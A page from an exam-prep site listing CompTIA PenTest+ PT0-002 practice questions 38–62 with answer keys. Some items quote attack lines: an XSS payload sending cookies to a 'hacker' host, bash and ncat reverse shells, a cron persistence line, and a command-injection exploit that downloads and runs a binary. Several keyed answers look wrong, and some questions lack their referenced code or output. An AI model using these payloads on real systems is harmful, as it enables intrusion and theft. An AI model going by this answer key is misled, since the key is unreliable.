Welcome to TestSimulate

Pass Your Next Certification Exam Fast!

Everything you need to prepare, learn & pass your certification exam easily.

365 days free updates. First attempt guaranteed success.

  • Home
  • Blogs
  • Latest [Aug 15, 2021] CompTIA PT0-002 Exam Practice Test To Gain Brilliante Result [Q38-Q62]

Latest [Aug 15, 2021] CompTIA PT0-002 Exam Practice Test To Gain Brilliante Result [Q38-Q62]

Share

Latest [Aug 15, 2021] CompTIA PT0-002 Exam Practice Test To Gain Brilliante Result

Take a Leap Forward in Your Career by Earning CompTIA PT0-002

NEW QUESTION 38
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. nc 10.10.51.50 9891 < exploit
  • B. wget 10.10.51.50:9891/exploit
  • C. powershell -exec bypass -f \\10.10.51.50\9891
  • D. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

Answer: B

 

NEW QUESTION 39
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Output encoding
  • C. Web-application firewall
  • D. Input validation
  • E. Parameterized queries
  • F. Base64 encoding

Answer: A,E

 

NEW QUESTION 40
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Incorporate the newly identified method of compromise into the red team's approach.
  • B. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • C. Create a detailed document of findings before continuing with the assessment.
  • D. Perform forensic analysis to isolate the means of compromise and determine attribution.

Answer: C

 

NEW QUESTION 41
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection
Send a "hello" payload
Walt for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Employ an OpenVAS simple scan against the TCP port of the host.
  • B. Create a script in the Lua language and use it with NSE.
  • C. Run nmap -Pn -sV -script vuln <IP address>.
  • D. Perform a credentialed scan with Nessus.

Answer: D

 

NEW QUESTION 42
Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

  • A. Domain enumeration
  • B. URL enumeration
  • C. Website scraping
  • D. Website cloning

Answer: C

 

NEW QUESTION 43
A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

  • A. Set the TTL of ping packets for stealth.
  • B. Determine active hosts on the network.
  • C. Fill the ARP table of the networked devices.
  • D. Scan the system on the most used ports.

Answer: B

 

NEW QUESTION 44
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team will be given access to source code for analysis.
  • B. The reverse-engineering team may have a history of selling exploits to third parties.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

Answer: A

 

NEW QUESTION 45
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

  • A. sudo useradd -ou 0 -g 0 user
  • B. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
  • C. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
  • D. wmic startup get caption,command

Answer: D

 

NEW QUESTION 46
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  • A. The name of the person who found the flaw
  • B. The CVSS score of the finding
  • C. The client acceptance form
  • D. The network location of the vulnerable device
  • E. The vulnerability identifier
  • F. The tool used to find the issue

Answer: E,F

 

NEW QUESTION 47
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

  • A. S/MIME
  • B. DNSSEC
  • C. FTPS
  • D. AS2

Answer: A

 

NEW QUESTION 48
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

  • A. Configure access controls on each of the servers
  • B. Deploy a user training program
  • C. Utilize the secure software development life cycle
  • D. Implement a patch management plan

Answer: D

 

NEW QUESTION 49
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

  • A. tcpdump
  • B. dig
  • C. Socat
  • D. Scapy

Answer: C

 

NEW QUESTION 50
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Answer:

Explanation:

 

NEW QUESTION 51
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. PowerShell modules
  • C. Alternate data streams
  • D. MP4 steganography

Answer: A

 

NEW QUESTION 52
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

  • A. Sessions and cookies
  • B. Password encryption
  • C. HTTPS communication
  • D. Public and private keys

Answer: A

 

NEW QUESTION 53
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the -sA option set against the target
  • B. Run nmap with the --script vulners option set against the target
  • C. Run nmap with the -sV and -p22 options set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Answer: A

 

NEW QUESTION 54
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. rm -rf /tmp/apache
  • C. taskkill /IM "apache" /F
  • D. grep -v apache ~/.bash_history > ~/.bash_history

Answer: B

 

NEW QUESTION 55
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Create a one-shot systemd service to establish a reverse shell.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Move laterally to create a user account on LDAP
  • D. Run the nc -e /bin/sh <...> command.

Answer: D

 

NEW QUESTION 56
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  • A. Semicolon
  • B. Double dash
  • C. Comma
  • D. Single quote

Answer: D

 

NEW QUESTION 57
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

  • A. iam_enum_permissions
  • B. iam_backdoor_assume_role
  • C. iam_privesc_scan
  • D. iam_bruteforce_permissions

Answer: A

 

NEW QUESTION 58
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -PS22-25,80
  • B. nmap 192.168.1.1-5 -PU22-25,80
  • C. nmap 192.168.1.1-5 -Ss22-25,80
  • D. nmap 192.168.1.1-5 -PA22-25,80

Answer: A

 

NEW QUESTION 59
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

  • A. NDA
  • B. MSA
  • C. SOW
  • D. MOU

Answer: C

 

NEW QUESTION 60
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

  • A. Implement multifactor authentication
  • B. Encrypt passwords for bank account information
  • C. Install video surveillance equipment in the office
  • D. Enforce mandatory employee vacations

Answer: A

 

NEW QUESTION 61
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As backup in case the original documents are lost
  • B. To validate the billing information with the client
  • C. To guide them through the building entrances
  • D. As proof in case they are discovered

Answer: D

 

NEW QUESTION 62
......

Authentic Best resources for PT0-002 Online Practice Exam: https://www.testsimulate.com/PT0-002-study-materials.html

Related Blogs

more
Go To PT0-002 Questions

Copyright © 2026 TESTSIMULATE.COM. All rights reserved. All trademarks are the property of their respective owners and we don't provide actual questions from any vendor.